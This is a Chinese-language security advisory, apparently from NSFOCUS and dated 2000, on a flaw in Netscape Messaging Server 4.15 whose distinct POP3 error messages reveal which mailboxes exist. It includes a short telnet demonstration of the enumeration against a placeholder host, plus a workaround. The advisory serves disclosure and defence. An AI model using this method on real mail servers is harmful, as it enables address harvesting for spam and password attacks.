Netscape Messaging Server邮件地址验证的漏洞
发布日期:2000-10-13
更新日期:2000-10-13
受影响系统:
Netscape Messaging Server 4.15
Netscape Messaging Server 4.15p1
Netscape Messaging Server 4.15p2
- Sun Solaris 2.x
- RedHat Linux
- IBM AIX
- HP HP-UX 11.0
- Digital UNIX
不受影响系统:
Netscape Messaging Server 3.0
描述:
当试图连接Netscape Messaging Server时,如果针对一个有效的邮件地址输入了一个无效的
密码,将会显示一条错误消息表明密码不正确。但是,当输入无效的邮件地址时,返回的错误
消息将表明所指定的邮件地址是一个无效的邮箱。根据不同的错误信息,邮件地址搜集者有可
能获得有效的邮件地址列表。
<* 来源:Matt Holtz (
mholtz@puck.nether.net) *>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
下面是一个演示不同错误信息的例子:
[user@ ~]$ telnet target 110
Trying target...
Connected target (target).
Escape character is '^]'.
+OK target POP3 service (Netscape Messaging Server 4.15 Patch 1 (built Mar 15 2000))
USER valid.user
+OK Name is a valid mailbox
PASS password
-ERR Password incorrect
quit
+OK
Connection closed by foreign host.
[user@ ~]$ telnet target 110
Trying target...
Connected to target (target).
Escape character is '^]'.
+OK target POP3 service (Netscape Messaging Server 4.15 Patch 1 (built Mar 15 2000))
user invalid.user
+OK Name is a valid mailbox
PASS password
-ERR User unknown
quit
+OK
Connection closed by foreign host.
建议:
临时解决方法:
NSFOCUS建议您在没有升级程序之前暂时换用其他的POP服务程序.
厂商补丁:
暂无
暂无
浏览次数:10894
严重程度:0(网友投票)
